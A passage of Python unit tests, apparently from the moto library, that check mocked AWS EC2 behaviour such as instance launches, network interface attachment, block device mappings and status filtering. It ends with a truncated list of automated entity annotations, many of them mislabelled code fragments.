ImageId=EXAMPLE_AMI_ID,
MaxCount=1,
MinCount=1,
SubnetId=subnet_id,
PrivateIpAddress="127.0.0.1",
)
instance = resp["Instances"][0]
instance["SubnetId"].should.equal(subnet_id)
instance["PrivateIpAddress"].should.equal("127.0.0.1")
@mock_ec2
def test_run_instance_mapped_public_ipv4():
client = boto3.client("ec2", region_name="eu-central-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
client.modify_subnet_attribute(
SubnetId=subnet_id, MapPublicIpOnLaunch={"Value": True}
)
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp["Instances"][0]
instance.should.contain("PublicDnsName")
instance.should.contain("PublicIpAddress")
len(instance["PublicDnsName"]).should.be.greater_than(0)
len(instance["PublicIpAddress"]).should.be.greater_than(0)
@mock_ec2_deprecated
def test_run_instance_with_nic_autocreated():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
private_ip = "127.0.0.1"
reservation = conn.run_instances(
EXAMPLE_AMI_ID,
subnet_id=subnet.id,
security_groups=[security_group1.name],
security_group_ids=[security_group2.id],
private_ip_address=private_ip,
)
instance = reservation.instances[0]
all_enis = conn.get_all_network_interfaces()
all_enis.should.have.length_of(1)
eni = all_enis[0]
instance.interfaces.should.have.length_of(1)
instance.interfaces[0].id.should.equal(eni.id)
instance.subnet_id.should.equal(subnet.id)
instance.groups.should.have.length_of(2)
set([group.id for group in instance.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni.subnet_id.should.equal(subnet.id)
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni.private_ip_addresses.should.have.length_of(1)
eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@mock_ec2_deprecated
def test_run_instance_with_nic_preexisting():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
private_ip = "127.0.0.1"
eni = conn.create_network_interface(
subnet.id, private_ip, groups=[security_group1.id]
)
# Boto requires NetworkInterfaceCollection of NetworkInterfaceSpecifications...
# annoying, but generates the desired querystring.
from boto.ec2.networkinterface import (
NetworkInterfaceSpecification,
NetworkInterfaceCollection,
)
interface = NetworkInterfaceSpecification(
network_interface_id=eni.id, device_index=0
)
interfaces = NetworkInterfaceCollection(interface)
# end Boto objects
reservation = conn.run_instances(
EXAMPLE_AMI_ID,
network_interfaces=interfaces,
security_group_ids=[security_group2.id],
)
instance = reservation.instances[0]
instance.subnet_id.should.equal(subnet.id)
all_enis = conn.get_all_network_interfaces()
all_enis.should.have.length_of(1)
instance.interfaces.should.have.length_of(1)
instance_eni = instance.interfaces[0]
instance_eni.id.should.equal(eni.id)
instance_eni.subnet_id.should.equal(subnet.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
instance_eni.private_ip_addresses.should.have.length_of(1)
instance_eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@requires_boto_gte("2.32.0")
@mock_ec2_deprecated
def test_instance_with_nic_attach_detach():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
reservation = conn.run_instances(
EXAMPLE_AMI_ID, security_group_ids=[security_group1.id]
)
instance = reservation.instances[0]
eni = conn.create_network_interface(subnet.id, groups=[security_group2.id])
# Check initial instance and ENI data
instance.interfaces.should.have.length_of(1)
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Attach
with pytest.raises(EC2ResponseError) as ex:
conn.attach_network_interface(eni.id, instance.id, device_index=1, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the AttachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"
)
conn.attach_network_interface(eni.id, instance.id, device_index=1)
# Check attached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(2)
instance_eni = instance.interfaces[1]
instance_eni.id.should.equal(eni.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni = conn.get_all_network_interfaces(filters={"network-interface-id": eni.id})[0]
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
# Detach
with pytest.raises(EC2ResponseError) as ex:
conn.detach_network_interface(instance_eni.attachment.id, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the DetachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"
)
conn.detach_network_interface(instance_eni.attachment.id)
# Check detached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(1)
eni = conn.get_all_network_interfaces(filters={"network-interface-id": eni.id})[0]
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Detach with invalid attachment ID
with pytest.raises(EC2ResponseError) as cm:
conn.detach_network_interface("eni-attach-1234abcd")
cm.value.code.should.equal("InvalidAttachmentID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ec2_classic_has_public_ip_address():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
instance.ip_address.should_not.equal(None)
instance.public_dns_name.should.contain(instance.ip_address.replace(".", "-"))
instance.private_ip_address.should_not.equal(None)
instance.private_dns_name.should.contain(
instance.private_ip_address.replace(".", "-")
)
@mock_ec2_deprecated
def test_run_instance_with_keypair():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
instance.key_name.should.equal("keypair_name")
@mock_ec2
def test_run_instance_with_block_device_mappings():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [{"DeviceName": "/dev/sda2", "Ebs": {"VolumeSize": 50}}],
}
ec2_client.run_instances(**kwargs)
instances = ec2_client.describe_instances()
volume = instances["Reservations"][0]["Instances"][0]["BlockDeviceMappings"][0][
"Ebs"
]
volumes = ec2_client.describe_volumes(VolumeIds=[volume["VolumeId"]])
volumes["Volumes"][0]["Size"].should.equal(50)
@mock_ec2
def test_run_instance_with_block_device_mappings_missing_ebs():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [{"DeviceName": "/dev/sda2"}],
}
with pytest.raises(ClientError) as ex:
ec2_client.run_instances(**kwargs)
ex.value.response["Error"]["Code"].should.equal("MissingParameter")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The request must contain the parameter ebs"
)
@mock_ec2
def test_run_instance_with_block_device_mappings_missing_size():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [
{"DeviceName": "/dev/sda2", "Ebs": {"VolumeType": "standard"}}
],
}
with pytest.raises(ClientError) as ex:
ec2_client.run_instances(**kwargs)
ex.value.response["Error"]["Code"].should.equal("MissingParameter")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The request must contain the parameter size or snapshotId"
)
@mock_ec2
def test_run_instance_with_block_device_mappings_from_snapshot():
ec2_client = boto3.client("ec2", region_name="us-east-1")
ec2_resource = boto3.resource("ec2", region_name="us-east-1")
volume_details = {
"AvailabilityZone": "1a",
"Size": 30,
}
volume = ec2_resource.create_volume(**volume_details)
snapshot = volume.create_snapshot()
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [
{"DeviceName": "/dev/sda2", "Ebs": {"SnapshotId": snapshot.snapshot_id}}
],
}
ec2_client.run_instances(**kwargs)
instances = ec2_client.describe_instances()
volume = instances["Reservations"][0]["Instances"][0]["BlockDeviceMappings"][0][
"Ebs"
]
volumes = ec2_client.describe_volumes(VolumeIds=[volume["VolumeId"]])
volumes["Volumes"][0]["Size"].should.equal(30)
volumes["Volumes"][0]["SnapshotId"].should.equal(snapshot.snapshot_id)
@mock_ec2_deprecated
def test_describe_instance_status_no_instances():
conn = boto.connect_ec2("the_key", "the_secret")
all_status = conn.get_all_instance_status()
len(all_status).should.equal(0)
@mock_ec2_deprecated
def test_describe_instance_status_with_instances():
conn = boto.connect_ec2("the_key", "the_secret")
conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
all_status = conn.get_all_instance_status()
len(all_status).should.equal(1)
all_status[0].instance_status.status.should.equal("ok")
all_status[0].system_status.status.should.equal("ok")
@mock_ec2_deprecated
def test_describe_instance_status_with_instance_filter_deprecated():
conn = boto.connect_ec2("the_key", "the_secret")
# We want to filter based on this one
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
# This is just to setup the test
conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
all_status = conn.get_all_instance_status(instance_ids=[instance.id])
len(all_status).should.equal(1)
all_status[0].id.should.equal(instance.id)
# Call get_all_instance_status with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_instance_status(instance_ids=[instance.id, "i-1234abcd"])
cm.value.code.should.equal("InvalidInstanceID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_describe_instance_credit_specifications():
conn = boto3.client("ec2", region_name="us-west-1")
# We want to filter based on this one
reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
result = conn.describe_instance_credit_specifications(
InstanceIds=[reservation["Instances"][0]["InstanceId"]]
)
assert (
result["InstanceCreditSpecifications"][0]["InstanceId"]
== reservation["Instances"][0]["InstanceId"]
)
@mock_ec2
def test_describe_instance_status_with_instance_filter():
conn = boto3.client("ec2", region_name="us-west-1")
# We want to filter based on this one
reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=3, MaxCount=3)
instance1 = reservation["Instances"][0]
instance2 = reservation["Instances"][1]
instance3 = reservation["Instances"][2]
conn.stop_instances(InstanceIds=[instance1["InstanceId"]])
stopped_instance_ids = [instance1["InstanceId"]]
running_instance_ids = sorted([instance2["InstanceId"], instance3["InstanceId"]])
all_instance_ids = sorted(stopped_instance_ids + running_instance_ids)
# Filter instance using the state name
state_name_filter = {
"running_and_stopped": [
{"Name": "instance-state-name", "Values": ["running", "stopped"]}
],
"running": [{"Name": "instance-state-name", "Values": ["running"]}],
"stopped": [{"Name": "instance-state-name", "Values": ["stopped"]}],
}
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["running_and_stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(all_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["running"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(running_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(stopped_instance_ids)
# Filter instance using the state code
state_code_filter = {
"running_and_stopped": [
{"Name": "instance-state-code", "Values": ["16", "80"]}
],
"running": [{"Name": "instance-state-code", "Values": ["16"]}],
"stopped": [{"Name": "instance-state-code", "Values": ["80"]}],
}
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["running_and_stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(all_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["running"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(running_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(stopped_instance_ids)
@requires_boto_gte("2.32.0")
@mock_ec2_deprecated
def test_describe_instance_status_with_non_running_instances():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
all_running_status = conn.get_all_instance_status()
all_running_status.should.have.length_of(1)
all_running_status[0].id.should.equal(instance3.id)
all_running_status[0].state_name.should.equal("running")
all_status = conn.get_all_instance_status(include_all_instances=True)
all_status.should.have.length_of(3)
status1 = next((s for s in all_status if s.id == instance1.id), None)
status1.state_name.should.equal("stopped")
status2 = next((s for s in all_status if s.id == instance2.id), None)
status2.state_name.should.equal("terminated")
status3 = next((s for s in all_status if s.id == instance3.id), None)
status3.state_name.should.equal("running")
@mock_ec2_deprecated
def test_get_instance_by_security_group():
conn = boto.connect_ec2("the_key", "the_secret")
conn.run_instances(EXAMPLE_AMI_ID)
instance = conn.get_only_instances()[0]
security_group = conn.create_security_group("test", "test")
with pytest.raises(EC2ResponseError) as ex:
conn.modify_instance_attribute(
instance.id, "groupSet", [security_group.id], dry_run=True
)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"
)
conn.modify_instance_attribute(instance.id, "groupSet", [security_group.id])
security_group_instances = security_group.instances()
assert len(security_group_instances) == 1
assert security_group_instances[0].id == instance.id
@mock_ec2
def test_modify_delete_on_termination():
ec2_client = boto3.resource("ec2", region_name="us-west-1")
result = ec2_client.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
instance = result[0]
instance.load()
instance.block_device_mappings[0]["Ebs"]["DeleteOnTermination"].should.be(True)
instance.modify_attribute(
BlockDeviceMappings=[
{"DeviceName": "/dev/sda1", "Ebs": {"DeleteOnTermination": False}}
]
)
instance.load()
instance.block_device_mappings[0]["Ebs"]["DeleteOnTermination"].should.be(False)
@mock_ec2
def test_create_instance_ebs_optimized():
ec2_resource = boto3.resource("ec2", region_name="eu-west-1")
instance = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, EbsOptimized=True
)[0]
instance.load()
instance.ebs_optimized.should.be(True)
instance.modify_attribute(EbsOptimized={"Value": False})
instance.load()
instance.ebs_optimized.should.be(False)
instance = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1,
)[0]
instance.load()
instance.ebs_optimized.should.be(False)
@mock_ec2
def test_run_multiple_instances_in_same_command():
instance_count = 4
client = boto3.client("ec2", region_name="us-east-1")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=instance_count, MaxCount=instance_count
)
reservations = client.describe_instances()["Reservations"]
reservations[0]["Instances"].should.have.length_of(instance_count)
instances = reservations[0]["Instances"]
for i in range(0, instance_count):
instances[i]["AmiLaunchIndex"].should.be(i)
@mock_ec2
def test_describe_instance_attribute():
client = boto3.client("ec2", region_name="us-east-1")
security_group_id = client.create_security_group(
GroupName="test security group", Description="this is a test security group"
)["GroupId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
SecurityGroupIds=[security_group_id],
)
instance_id = client.describe_instances()["Reservations"][0]["Instances"][0][
"InstanceId"
]
valid_instance_attributes = [
"instanceType",
"kernel",
"ramdisk",
"userData",
"disableApiTermination",
"instanceInitiatedShutdownBehavior",
"rootDeviceName",
"blockDeviceMapping",
"productCodes",
"sourceDestCheck",
"groupSet",
"ebsOptimized",
"sriovNetSupport",
]
for valid_instance_attribute in valid_instance_attributes:
response = client.describe_instance_attribute(
InstanceId=instance_id, Attribute=valid_instance_attribute
)
if valid_instance_attribute == "groupSet":
response.should.have.key("Groups")
response["Groups"].should.have.length_of(1)
response["Groups"][0]["GroupId"].should.equal(security_group_id)
elif valid_instance_attribute == "userData":
response.should.have.key("UserData")
response["UserData"].should.be.empty
invalid_instance_attributes = [
"abc",
"Kernel",
"RamDisk",
"userdata",
"iNsTaNcEtYpE",
]
for invalid_instance_attribute in invalid_instance_attributes:
with pytest.raises(ClientError) as ex:
client.describe_instance_attribute(
InstanceId=instance_id, Attribute=invalid_instance_attribute
)
ex.value.response["Error"]["Code"].should.equal("InvalidParameterValue")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
message = "Value ({invalid_instance_attribute}) for parameter attribute is invalid. Unknown attribute.".format(
invalid_instance_attribute=invalid_instance_attribute
)
ex.value.response["Error"]["Message"].should.equal(message)
@mock_ec2
def test_warn_on_invalid_ami():
if settings.TEST_SERVER_MODE:
raise SkipTest("Can't capture warnings in server mode.")
ec2 = boto3.resource("ec2", "us-east-1")
with pytest.warns(
PendingDeprecationWarning,
match=r"Could not find AMI with image-id:invalid-ami.+",
):
ec2.create_instances(ImageId="invalid-ami", MinCount=1, MaxCount=1)
| 62,433 | [['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.99.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'conn = boto.connect_ec2'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'zone=conn.region.name'], ['LOCATION', 'test_get_paginated_instances'], ['PERSON', 'conn = boto3.resource("ec2'], ['PERSON', 'instance3'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc("the_key'], ['LOCATION', 'min_count=1'], ['LOCATION', 'min_count=1'], ['PERSON', 'min_count=1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto3.resource("ec2'], ['PERSON', 'conn = boto3.resource("ec2'], ['PERSON', 'conn = boto3.resource("ec2'], ['PERSON', 'conn = boto3.resource("ec2'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'Boto'], ['PERSON', 'DryRun'], ['PERSON', 'test_user_data_with_run_instance'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_vpc("the_key'], ['PERSON', 'instance.groups.should.have.length_of(2'], ['PERSON', 'conn = boto.connect_vpc("the_key'], ['PERSON', 'Boto'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn.detach_network_interface("eni-attach-1234abcd'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto3.client("ec2'], ['PERSON', 'conn = boto3.client("ec2'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['DATE_TIME', 'test_warn_on_invalid_ami'], ['DATE_TIME', '2014-01-01'], ['DATE_TIME', '2014-01-01'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['URL', 'boto.ec2.in'], ['URL', 'six.PY'], ['URL', 'base64.de'], ['URL', 'base64.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'instance1.im'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.ru'], ['URL', 'reservation.should.be'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', 'instance.state.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.id.sh'], ['URL', 'reservation.id'], ['URL', 'instances.sh'], ['URL', 'instance.id.sh'], ['URL', 'instance.id'], ['URL', 'instance.state.sh'], ['URL', 'instance.la'], ['URL', 'time.sh'], ['URL', 'id.sh'], ['URL', 'instance.placement.sh'], ['URL', 'instance.ro'], ['URL', '.status.sh'], ['URL', 'id.should.ma'], ['URL', 'conn.ge'], ['URL', 'volume.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'volume.status.sh'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'volume.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'ex.value.re'], ['URL', 'InvalidAttachment.No'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'instance.in'], ['URL', 'boto.co'], ['URL', 'instances.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol1.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol2.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol3.at'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'mapping.sh'], ['URL', 'conn.ge'], ['URL', 'v.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'v.at'], ['URL', 'data.at'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.cr'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.region.name.sh'], ['URL', 'instance.region.na'], ['URL', 'v.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'instance.id'], ['URL', 'reservation.in'], ['URL', 'ids.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'token.sh'], ['URL', 'not.be.no'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'resp2.ke'], ['URL', 'boto3.cl'], ['URL', 'ec2.ru'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'ids.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation1.in'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation2.in'], ['URL', 'conn.ru'], ['URL', 'reservation3.in'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'Client.Us'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'i.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 